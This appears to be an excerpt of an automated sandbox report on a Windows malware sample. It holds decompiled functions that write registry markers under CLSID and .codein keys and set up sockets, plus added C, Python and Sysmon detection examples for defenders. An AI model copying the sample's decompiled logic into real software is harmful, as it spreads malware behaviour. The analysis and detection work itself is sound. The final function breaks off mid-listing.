                                                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 04EC5266
                                                                                    • LocalSize.KERNEL32 ref: 04EC526F
                                                                                    • lstrlenA.KERNEL32(00000001), ref: 04EC5278
                                                                                    • LocalReAlloc.KERNEL32(?,00000005,00000042), ref: 04EC5287
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 04EC5298
                                                                                    • lstrlenA.KERNEL32(00000001,?,00000005,00000042), ref: 04EC529F
                                                                                    Strings
                                                                                    • 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942, xrefs: 04EC51FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locallstrlen$AllocWindow$ClassNameProcessSizeTextThread_strrchr
                                                                                    • String ID: 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
                                                                                    • API String ID: 414574500-3141347713
                                                                                    • Opcode ID: eee9ad495e92c9464141284664ceabc8d990bcb554ebf3174f7b168e0db0988e
                                                                                    • Instruction ID: 936c0b1e992c750aed13ed1b3868313751c766254c7873700faf54c1a6fc5091
                                                                                    • Opcode Fuzzy Hash: eee9ad495e92c9464141284664ceabc8d990bcb554ebf3174f7b168e0db0988e
                                                                                    • Instruction Fuzzy Hash: A931F6B5A00218AFD7109F609D85FAA77FCEF84305F0050A9EB45D7241EB75BE4A8B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
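
Added example, not code from the report or from the sample: E04EC5180 has the shape of an EnumWindows callback (HWND plus a void** accumulator). It returns immediately unless the window's class name equals the string 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942; for a match it reads the window title, takes the text after the last '_' (the _strrchr with 0x5f), grows an HLOCAL buffer by strlen(suffix) + 5 with LocalReAlloc(..., 0x42 = LMEM_MOVEABLE | LMEM_ZEROINIT) and appends the owning PID as a DWORD followed by the NUL-terminated suffix. The first allocation is LocalAlloc(0x40, 1), so records start at offset 1. The C below reproduces that accumulation and adds a decoder for the resulting buffer, using constructed windows instead of real HWNDs so it runs off Windows; what the collected list is used for is not established by this fragment, and all type and function names are the example's own.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MARKER_CLASS "5B3838F5-0C81-46D9-A4C0-6EA28CA3E942"

/* Constructed stand-in for a window: what GetClassNameA, GetWindowTextA
 * and GetWindowThreadProcessId would report for it. */
typedef struct { const char *class_name; const char *title; uint32_t pid; } FakeWindow;

/* Growable buffer standing in for the HLOCAL kept behind the void** argument. */
typedef struct { uint8_t *data; size_t size; } RecordBuf;

/* One callback invocation. Returns 1 if a record was appended, 0 if the
 * window was skipped, -1 on allocation failure. */
int collect_window(RecordBuf *buf, const FakeWindow *w)
{
    if (w->class_name == NULL || w->class_name[0] == '\0') return 0;  /* lstrlenA == 0 */
    if (strcmp(w->class_name, MARKER_CLASS) != 0) return 0;
    const char *us = strrchr(w->title, '_');                          /* _strrchr(title, 0x5f) */
    if (us == NULL) return 0;
    const char *suffix = us + 1;
    if (buf->data == NULL) {                      /* LocalAlloc(0x40, 1): one zeroed byte */
        buf->data = calloc(1, 1);
        if (buf->data == NULL) return -1;
        buf->size = 1;
    }
    size_t old = buf->size;                       /* LocalSize(buf) */
    size_t add = strlen(suffix) + 5;              /* 4-byte PID + suffix + NUL */
    uint8_t *p = realloc(buf->data, old + add);   /* LocalReAlloc(buf, old + add, 0x42) */
    if (p == NULL) return -1;
    memset(p + old, 0, add);                      /* LMEM_ZEROINIT */
    memcpy(p + old, &w->pid, 4);                  /* GetWindowThreadProcessId(hwnd, (DWORD*)dst) */
    memcpy(p + old + 4, suffix, strlen(suffix) + 1);
    buf->data = p;
    buf->size = old + add;
    return 1;
}

/* Decode the buffer: skip the 1-byte header, then repeat [pid:4][suffix\0]. */
size_t parse_records(const RecordBuf *buf, uint32_t *pids, const char **names, size_t max)
{
    size_t n = 0, off = 1;
    while (n < max && off + 5 <= buf->size) {
        memcpy(&pids[n], buf->data + off, 4);
        names[n] = (const char *)(buf->data + off + 4);
        off += 4 + strlen(names[n]) + 1;
        n++;
    }
    return n;
}

/* Constructed window list (not observed data). */
static const FakeWindow SAMPLE_WINDOWS[] = {
    { "Notepad",     "Untitled - Notepad_x", 1000 },  /* class mismatch: skipped */
    { MARKER_CLASS,  "no underscore here",   2000 },  /* no '_': skipped */
    { MARKER_CLASS,  "host_svchost",         3000 },
    { MARKER_CLASS,  "a_b_explorer",         4000 },  /* strrchr takes the last '_' */
    { "",            "empty class",          5000 },  /* empty class name: early return */
};

static uint32_t g_pids[8];
static const char *g_names[8];
static RecordBuf g_buf;
static size_t g_count;
static int g_ran;

static void run_sample(void)
{
    if (g_ran) return;
    for (size_t i = 0; i < sizeof SAMPLE_WINDOWS / sizeof SAMPLE_WINDOWS[0]; i++)
        collect_window(&g_buf, &SAMPLE_WINDOWS[i]);
    g_count = parse_records(&g_buf, g_pids, g_names, 8);
    g_ran = 1;
}

size_t      sample_record_count(void) { run_sample(); return g_count; }
uint32_t    sample_pid(size_t i)      { run_sample(); return g_pids[i]; }
const char *sample_name(size_t i)     { run_sample(); return g_names[i]; }
size_t      sample_buffer_size(void)  { run_sample(); return g_buf.size; }
```

For the constructed list the buffer is 26 bytes: the 1-byte header, then (4 + 8) for PID 3000 with "svchost" and (4 + 9) for PID 4000 with "explorer". A memory scan for the GUID as a window class name, or an EnumWindows listing filtered on that class, is the practical check this fragment suggests.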

                                                                                    C-Code - Quality: 88%
                                                                                    			E04EC9360(void* __ebx, struct _SECURITY_ATTRIBUTES** __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				char _v616;
                                                                                    				signed int _t23;
                                                                                    				void* _t30;
                                                                                    				int* _t65;
                                                                                    				signed int _t66;
                                                                                    
                                                                                    				_t23 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t23 ^ _t66;
                                                                                    				_t65 = __ecx;
                                                                                    				_push(__edi);
                                                                                    				 *__ecx = 0;
                                                                                    				E04EC6010(__ebx, _a4,  &_v88, __edi, __ecx);
                                                                                    				wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                                                    				_t30 = CreateEventW(0, 1, 0,  &_v608);
                                                                                    				_t65[2] = _t30;
                                                                                    				if(_t30 == 0) {
                                                                                    					L5:
                                                                                    					 *_t65 = 1;
                                                                                    					goto L6;
                                                                                    				} else {
                                                                                    					if(GetLastError() != 0xb7) {
                                                                                    						_v616 = GetCurrentThreadId() + 0x13c;
                                                                                    						wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    						_v612 = 0;
                                                                                    						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0) != 0) {
                                                                                    							goto L5;
                                                                                    						} else {
                                                                                    							RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4);
                                                                                    							_t62 =  ==  ? 1 : 0;
                                                                                    							RegCloseKey(_v612);
                                                                                    							__eflags =  ==  ? 1 : 0;
                                                                                    							if(( ==  ? 1 : 0) == 0) {
                                                                                    								goto L5;
                                                                                    							}
                                                                                    						}
                                                                                    						L6:
                                                                                    						return E04ED572E(_v8 ^ _t66);
                                                                                    					} else {
                                                                                    						CloseHandle(_t65[2]);
                                                                                    						_t65[1] = 1;
                                                                                    						return E04ED572E(_v8 ^ _t66);
                                                                                    					}
                                                                                    				}
			}

Instruction addresses (listing order): 0x04ec9369, 0x04ec9370, 0x04ec9374, 0x04ec937c, 0x04ec937d, 0x04ec9383, 0x04ec939e, 0x04ec93b0, 0x04ec93b6, 0x04ec93bb, 0x04ec947e, 0x04ec947e, 0x00000000, 0x04ec93c1, 0x04ec93cc, 0x04ec93fd, 0x04ec9413, 0x04ec9420, 0x04ec9445, 0x00000000, 0x04ec9447, 0x04ec945e, 0x04ec9471, 0x04ec9474, 0x04ec947a, 0x04ec947c, 0x00000000, 0x00000000, 0x04ec947c, 0x04ec9484, 0x04ec949a, 0x04ec93ce, 0x04ec93d1, 0x04ec93d8, 0x04ec93ef, 0x04ec93ef, 0x04ec93cc

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC939E
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 04EC93B0
                                                                                    • GetLastError.KERNEL32 ref: 04EC93C1
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC93D1
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 04EC93F2
                                                                                    • wsprintfW.USER32 ref: 04EC9413
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EC943D
                                                                                    • RegSetValueExW.ADVAPI32(?,04EFD09C,00000000,00000004,?,00000004), ref: 04EC945E
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC9474
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$CreateValuewsprintf$CurrentErrorEventHandleLastOpenQueryThread
                                                                                    • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 709688788-2346361075
                                                                                    • Opcode ID: 07d02ae6d485eb42bcb66b96568e4ca73cbdbda30b3b00107d2f9176742a39b2
                                                                                    • Instruction ID: 27b6342c34e0ae4fe7c4448171b946381d346e620fe4ad0998fdf9a6aa59e3ff
                                                                                    • Opcode Fuzzy Hash: 07d02ae6d485eb42bcb66b96568e4ca73cbdbda30b3b00107d2f9176742a39b2
                                                                                    • Instruction Fuzzy Hash: FA31B271600208AFDB20DFA5DC49FABB7B9EFC4701F10406AE94AE6184EB75AA44CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
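The registry calls traced for E04EC9360 pass samDesired values of 0x20119 (in the E04EC6010 subcall) and 0xF013F, and the .codein function later in this report uses 0x20106 and 0x104. The script below is an added example, not part of the sandbox report or of the sample's code: it decodes those masks with the documented winreg constants and pulls hive, subkey and rights out of trace lines in the report's `Api.Module(args), ref: ADDR` shape. The four trace lines embedded in it are copied from this report; "004F0053" and "?" are what the tracer printed where it could not resolve lpSubKey, so the parser marks those as unresolved instead of treating a pointer as a key path. The point worth checking by hand: every mask carries KEY_WOW64_64KEY, so this 32-bit code (the listing uses 32-bit registers and a 32-bit stack cookie) deliberately opens the native 64-bit registry view on a 64-bit host; the CLSID subtree is WOW64-redirected, so without that flag the marker would land under Wow6432Node and an analyst looking only at the redirected view would miss it.

```python
import re

# Registry access-right bits from winnt.h / winreg.h (documented constants).
KEY_RIGHTS = {
    0x00000001: "KEY_QUERY_VALUE",
    0x00000002: "KEY_SET_VALUE",
    0x00000004: "KEY_CREATE_SUB_KEY",
    0x00000008: "KEY_ENUMERATE_SUB_KEYS",
    0x00000010: "KEY_NOTIFY",
    0x00000020: "KEY_CREATE_LINK",
    0x00000100: "KEY_WOW64_64KEY",
    0x00000200: "KEY_WOW64_32KEY",
    0x00010000: "DELETE",
    0x00020000: "READ_CONTROL",
    0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER",
    0x00100000: "SYNCHRONIZE",
}
KEY_ALL_ACCESS = 0x000F003F
HIVES = {0x80000001: "HKCU", 0x80000002: "HKLM"}

# Position of samDesired in each API's argument list.
SAM_INDEX = {"RegOpenKeyExW": 3, "RegCreateKeyExW": 5}

# Shape of the report's API lines: Api.Module(args), ref: ADDR
API_RE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)")


def decode_sam(mask):
    """Return the named access rights in a samDesired mask, lowest bit first."""
    names = [name for bit, name in sorted(KEY_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(KEY_RIGHTS)
    if unknown:
        names.append(hex(unknown))
    return names


def _hex(s):
    try:
        return int(s, 16)
    except ValueError:
        return None


def parse_api_line(line):
    """Parse one RegOpenKeyExW / RegCreateKeyExW trace line into a dict, else None."""
    m = API_RE.search(line)
    if not m or m["api"] not in SAM_INDEX:
        return None
    args = [a.strip() for a in m["args"].split(",")]
    idx = SAM_INDEX[m["api"]]
    if len(args) <= idx:
        return None
    hive, sam = _hex(args[0]), _hex(args[idx])
    if hive is None or sam is None:
        return None
    subkey = args[1]
    # The tracer prints a raw pointer (8 hex digits) or "?" when it could not
    # read the string; treat both as unresolved rather than as a key path.
    if subkey == "?" or re.fullmatch(r"[0-9A-Fa-f]{8}", subkey):
        subkey = "<unresolved>"
    rights = decode_sam(sam)
    return {
        "api": m["api"],
        "ref": m["ref"],
        "hive": HIVES.get(hive, hex(hive)),
        "subkey": subkey,
        "sam": sam,
        "rights": rights,
        "wow64_64": "KEY_WOW64_64KEY" in rights,
        "all_access": (sam & KEY_ALL_ACCESS) == KEY_ALL_ACCESS,
    }


def analyze(lines):
    return [r for r in (parse_api_line(l) for l in lines) if r is not None]


# Trace lines copied from this report (004F0053 is the raw lpSubKey pointer
# the tracer printed for the E04EC6010 subcall).
REPORT_LINES = [
    "Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1",
    "RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EC943D",
    r"RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 04EB6439",
    r"RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EB64FB",
]

if __name__ == "__main__":
    for r in analyze(REPORT_LINES):
        print(r["ref"], r["api"], r["hive"] + "\\" + r["subkey"], hex(r["sam"]),
              " | ".join(r["rights"]))
```

The parser is deliberately tolerant of the extra stack arguments the tracer appends after the real parameter list (the subcall line shows eight arguments for a five-parameter API); it only trusts the positions up to samDesired.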

                                                                                    C-Code - Quality: 100%
                                                                                    			E04EB63F0(void* __ebx, void* __ecx) {
                                                                                    				void* _v8;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* _t17;
                                                                                    				void* _t20;
                                                                                    				intOrPtr _t21;
                                                                                    				intOrPtr _t27;
                                                                                    				void* _t37;
                                                                                    				void* _t40;
                                                                                    
                                                                                    				_t45 =  *0x4f068d0;
                                                                                    				_t40 = __ecx;
                                                                                    				if( *0x4f068d0 == 0) {
                                                                                    					 *0x4f068d0 = E04EB62B0(__ebx, E04ED5744(__ecx, _t45, 0x3c), _t37, _t45);
                                                                                    				}
                                                                                    				_v8 = 0;
                                                                                    				if(_t40 == 0) {
                                                                                    					RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
                                                                                    					_t17 = _v8;
                                                                                    					__eflags = _t17;
                                                                                    					if(_t17 != 0) {
                                                                                    						RegCloseKey(_t17);
                                                                                    					}
                                                                                    					_v8 = 0;
                                                                                    					RegCreateKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0, 0, 0x104, 0,  &_v8, 0);
                                                                                    					_t20 = _v8;
                                                                                    					__eflags = _t20;
                                                                                    					if(_t20 != 0) {
                                                                                    						RegCloseKey(_t20);
                                                                                    					}
                                                                                    					_t21 =  *0x4f068d0; // 0x0
                                                                                    					 *((intOrPtr*)(_t21 + 0x38)) = 1;
                                                                                    					return _t21;
                                                                                    				} else {
                                                                                    					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
                                                                                    						SHDeleteKeyW(_v8, 0x4efb5d0);
                                                                                    						RegCloseKey(_v8);
                                                                                    					}
                                                                                    					_v8 = 0;
                                                                                    					if(RegOpenKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0x20106,  &_v8) == 0) {
                                                                                    						SHDeleteKeyW(_v8, 0x4efb5d0);
                                                                                    						RegCloseKey(_v8);
                                                                                    					}
                                                                                    					_t27 =  *0x4f068d0; // 0x0
                                                                                    					 *(_t27 + 0x38) = 0;
                                                                                    					return _t27;
                                                                                    				}
			}

Instruction addresses (listing order): 0x04eb63f6, 0x04eb63ff, 0x04eb6401, 0x04eb6414, 0x04eb6414, 0x04eb6419, 0x04eb6425, 0x04eb64c5, 0x04eb64c7, 0x04eb64d0, 0x04eb64d2, 0x04eb64d5, 0x04eb64d5, 0x04eb64dc, 0x04eb64fb, 0x04eb64fd, 0x04eb6500, 0x04eb6502, 0x04eb6505, 0x04eb6505, 0x04eb6507, 0x04eb650e, 0x04eb6518, 0x04eb6427, 0x04eb644d, 0x04eb6457, 0x04eb645c, 0x04eb645c, 0x04eb6461, 0x04eb6482, 0x04eb648c, 0x04eb6491, 0x04eb6491, 0x04eb6493, 0x04eb6498, 0x04eb64a4, 0x04eb64a4

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 04EB6439
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EB6457
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EB645C
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00020106,00000000), ref: 04EB647A
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EB648C
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EB6491
                                                                                      • Part of subcall function 04EB62B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00020119,04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB6350
                                                                                      • Part of subcall function 04EB62B0: RegCloseKey.ADVAPI32(04ECB38C,?,04F05318,?,?,04ECB38C), ref: 04EB635D
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EB64C5
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EB64D5
                                                                                    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Classes\.codein,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EB64FB
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EB6505
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$Open$CreateDelete
                                                                                    • String ID: SOFTWARE\Classes\.codein
                                                                                    • API String ID: 185900105-3041101089
                                                                                    • Opcode ID: 262d1382d3eb8de083d68dbcb3eaaa26c82e1aec80969f9cdb00a53ccdcacda8
                                                                                    • Instruction ID: bfcca393ede928b76c36bb79846bb6aeb9dcf57e3c54f2674f2811cca95e3dbc
                                                                                    • Opcode Fuzzy Hash: 262d1382d3eb8de083d68dbcb3eaaa26c82e1aec80969f9cdb00a53ccdcacda8
                                                                                    • Instruction Fuzzy Hash: ED312C70B80318BBEB20DE65EC06F9A7BA8EB80B14F341055FE45B7180D6B47E549A95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
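Between them, E04EC9360 and E04EB63F0 leave two registry artifacts a defender can key on: a REG_DWORD value named "1" (current thread id plus 0x13c, per the listing) written directly under HKLM\SOFTWARE\Classes\CLSID\<name>, and a SOFTWARE\Classes\.codein key created in both HKLM and HKCU when the function is called with a zero argument, with a subkey deleted under it by SHDeleteKeyW on the other path. The detection logic below is an added example and not part of the report: it runs three rules over constructed Sysmon-style registry events (EventID 12 for key create/delete, EventID 13 for value set, field names as Sysmon emits them, with HKCU rendered as HKU\<SID>). The GUID, the SID, the DWORD value and the deleted subkey name are placeholders; the listing does not resolve the string at 0x4efb5d0 that SHDeleteKeyW receives.

```python
import re

# Constructed Sysmon-style registry events, built for this example. The value
# name "1" and the DWORD type are what E04EC9360 writes; the GUID is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 13, "EventType": "SetValue",
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\5B3838F5-0C81-46D9-A4C0-6EA28CA3E942\1",
     "Details": "DWORD (0x00000f9c)"},
    {"EventID": 12, "EventType": "CreateKey",
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\.codein", "Details": ""},
    {"EventID": 12, "EventType": "CreateKey",
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKU\S-1-5-21-1004336348-1177238915-682003330-1001\SOFTWARE\Classes\.codein",
     "Details": ""},
    # Hypothetical subkey name: the listing does not resolve the string passed
    # to SHDeleteKeyW, so "sub" stands in for it here.
    {"EventID": 12, "EventType": "DeleteKey",
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\.codein\sub", "Details": ""},
    # Benign: a COM server registering normally.
    {"EventID": 13, "EventType": "SetValue",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{00021401-0000-0000-C000-000000000046}\InprocServer32\(Default)",
     "Details": r"C:\Windows\System32\shell32.dll"},
    # Benign: an installer registering a file extension.
    {"EventID": 12, "EventType": "CreateKey",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\.xyzdoc", "Details": ""},
]

# HKLM, HKCU or HKU\<SID>, then SOFTWARE\Classes\.codein itself or anything below it.
CODEIN_RE = re.compile(r"^HK(LM|CU|U\\[^\\]+)\\SOFTWARE\\Classes\\\.codein(\\|$)", re.I)
# A value literally named "1" directly under a CLSID subkey; normal COM
# registration writes (Default), InprocServer32 and friends, not this.
CLSID_ONE_RE = re.compile(r"^HKLM\\SOFTWARE\\Classes\\CLSID\\[^\\]+\\1$", re.I)
SVCHOST_RE = re.compile(r"\\svchost\.exe$", re.I)


def rule_codein_marker(ev):
    return ev["EventID"] == 12 and CODEIN_RE.match(ev["TargetObject"]) is not None


def rule_clsid_dword_marker(ev):
    return (ev["EventID"] == 13
            and CLSID_ONE_RE.match(ev["TargetObject"]) is not None
            and ev["Details"].startswith("DWORD"))


def rule_svchost_writes_classes(ev):
    # Broader rule tied to the report's injection-into-svchost finding: svchost.exe
    # rarely has reason to touch SOFTWARE\Classes, so baseline it before deploying.
    return (SVCHOST_RE.search(ev["Image"]) is not None
            and "\\SOFTWARE\\CLASSES\\" in ev["TargetObject"].upper())


RULES = {
    "codein_marker": rule_codein_marker,
    "clsid_dword_marker": rule_clsid_dword_marker,
    "svchost_writes_classes": rule_svchost_writes_classes,
}


def detect(events):
    """Return (event index, rule name) pairs for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for i, name in detect(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"[{name}] {ev['EventType']} {ev['TargetObject']} by {ev['Image']}")
```

The first two rules are tight enough to alert on directly; the third is a hunting query rather than an alert, since which services a given svchost instance hosts varies by host and some of them do legitimately write under Classes.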

                                                                                    C-Code - Quality: 34%
                                                                                    			E04ED3CC0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4, char _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                    				signed int _v8;
                                                                                    				char _v12;
                                                                                    				char _v16;
                                                                                    				void* _v20;
                                                                                    				intOrPtr* _v24;
                                                                                    				intOrPtr* _v28;
                                                                                    				signed int _v44;
                                                                                    				char _v48;
                                                                                    				intOrPtr _v52;
                                                                                    				intOrPtr _v56;
                                                                                    				signed int _v68;
                                                                                    				intOrPtr _v72;
                                                                                    				char _v76;
                                                                                    				signed int _t73;
                                                                                    				void* _t79;
                                                                                    				long _t85;
                                                                                    				long _t89;
                                                                                    				long _t92;
                                                                                    				signed int _t94;
                                                                                    				signed int _t103;
                                                                                    				void* _t104;
                                                                                    				signed int _t105;
                                                                                    				long _t106;
                                                                                    				void* _t115;
                                                                                    				intOrPtr* _t120;
                                                                                    				intOrPtr _t121;
                                                                                    				signed int _t135;
                                                                                    				intOrPtr* _t139;
                                                                                    				long _t140;
                                                                                    				struct _CRITICAL_SECTION* _t144;
                                                                                    				intOrPtr _t146;
                                                                                    				intOrPtr _t148;
                                                                                    				signed int _t149;
                                                                                    				signed int _t150;
                                                                                    				signed int _t151;
                                                                                    
                                                                                    				_t73 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t73 ^ _t149;
                                                                                    				_push(__ebx);
                                                                                    				_push(__esi);
                                                                                    				_v12 = _a4;
                                                                                    				_push(__edi);
                                                                                    				_t139 = __ecx;
                                                                                    				_v16 = _a12;
                                                                                    				_v28 = _a16;
                                                                                    				_v24 = __ecx;
                                                                                    				_v20 = 0;
                                                                                    				_t79 = E04ECC4C0(__ecx + 0xb0,  &_v20);
                                                                                    				_t155 = _t79;
                                                                                    				if(_t79 != 0) {
                                                                                    					_t115 = _v20;
                                                                                    				} else {
                                                                                    					_t148 =  *((intOrPtr*)(__ecx + 0xa4));
                                                                                    					_t115 = HeapAlloc( *(__ecx + 0x94), 0, _t148 + 0x38);
                                                                                    					_v20 = _t115;
                                                                                    					_t17 = _t115 + 0x38; // 0x38
                                                                                    					 *(_t115 + 0x14) = _t139 + 0x94;
                                                                                    					 *((intOrPtr*)(_t115 + 0x24)) = _t148;
                                                                                    					 *((intOrPtr*)(_t115 + 0x20)) = _t17;
                                                                                    				}
                                                                                    				_push(_v16);
                                                                                    				asm("xorps xmm0, xmm0");
                                                                                    				_push(_v12);
                                                                                    				asm("movups [ebx], xmm0");
                                                                                    				 *(_t115 + 0x10) = 0;
                                                                                    				 *(_t115 + 0x1c) = 0;
                                                                                    				 *(_t115 + 0x1c) =  *(_t139 + 0x18);
                                                                                    				_t140 = E04ED2430(_t139, _t155);
                                                                                    				_t28 = _t140 + 0x54; // 0x54
                                                                                    				_t144 = _t28;
                                                                                    				EnterCriticalSection(_t144);
                                                                                    				_push(_a20);
                                                                                    				_t120 = _v24;
                                                                                    				E04ED2650(_t120, _t144, _v12, _t140, _v28, _t139);
                                                                                    				if( *((intOrPtr*)(_v24 + 0x4c)) == 0) {
                                                                                    					_t120 = _v28;
                                                                                    					__eflags =  *_t120 - 2;
                                                                                    					_t85 =  !=  ? 0x1c : 0x10;
                                                                                    					__imp__#4( *(_t140 + 0x88), _t120, 0x10);
                                                                                    					__eflags = 0x10 - 0xffffffff;
                                                                                    					if(0x10 == 0xffffffff) {
                                                                                    						__imp__#111();
                                                                                    						goto L15;
                                                                                    					} else {
                                                                                    						_t92 =  &_v12;
                                                                                    						_v12 = 1;
                                                                                    						__imp__#10( *(_t140 + 0x88), 0x8004667e, _t92);
                                                                                    						__eflags = _t92;
                                                                                    						if(_t92 != 0) {
                                                                                    							goto L22;
                                                                                    						} else {
                                                                                    							_t103 = CreateIoCompletionPort( *(_t140 + 0x88),  *(_v24 + 0x50), _t140, _t92);
                                                                                    							__eflags = _t103;
                                                                                    							if(_t103 == 0) {
                                                                                    								goto L7;
                                                                                    							} else {
                                                                                    								 *((intOrPtr*)(_t140 + 0x48)) = 1;
                                                                                    								_t104 = E04ED1D30(_v24, _t140);
                                                                                    								__eflags = _t104 - 2;
                                                                                    								if(_t104 == 2) {
                                                                                    									_t105 = GetLastError();
                                                                                    									__eflags = _t105;
                                                                                    									_t85 =  ==  ? 0x4c7 : _t105;
                                                                                    									goto L15;
                                                                                    								} else {
                                                                                    									_t85 = E04ED3700(_t115, _v24, _t140, _t144, _t140, _t115);
                                                                                    									_t121 = 0;
                                                                                    								}
                                                                                    							}
                                                                                    							goto L16;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t106 =  &_v16;
                                                                                    					_v16 = 1;
                                                                                    					__imp__#10( *(_t140 + 0x88), 0x8004667e, _t106);
                                                                                    					if(_t106 != 0) {
                                                                                    						_push(0x80004005);
                                                                                    						E04EB7AB0();
                                                                                    						L22:
                                                                                    						E04EB7AB0();
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						asm("int3");
                                                                                    						_t150 = _t151;
                                                                                    						_t94 =  *0x4f03008; // 0x3d21fb31
                                                                                    						_v68 = _t94 ^ _t150;
                                                                                    						_t135 = _v44;
                                                                                    						__eflags = _t135;
                                                                                    						_t146 = _v52;
                                                                                    						_v76 = _v48;
                                                                                    						_t98 =  ==  ? _t146 : _t146 + _t135;
                                                                                    						_v72 =  ==  ? _t146 : _t146 + _t135;
                                                                                    						 *((intOrPtr*)( *_t120 + 8))( &_v76, 1, _t144, _t149, 0x80004005);
                                                                                    						__eflags = _v68 ^ _t150;
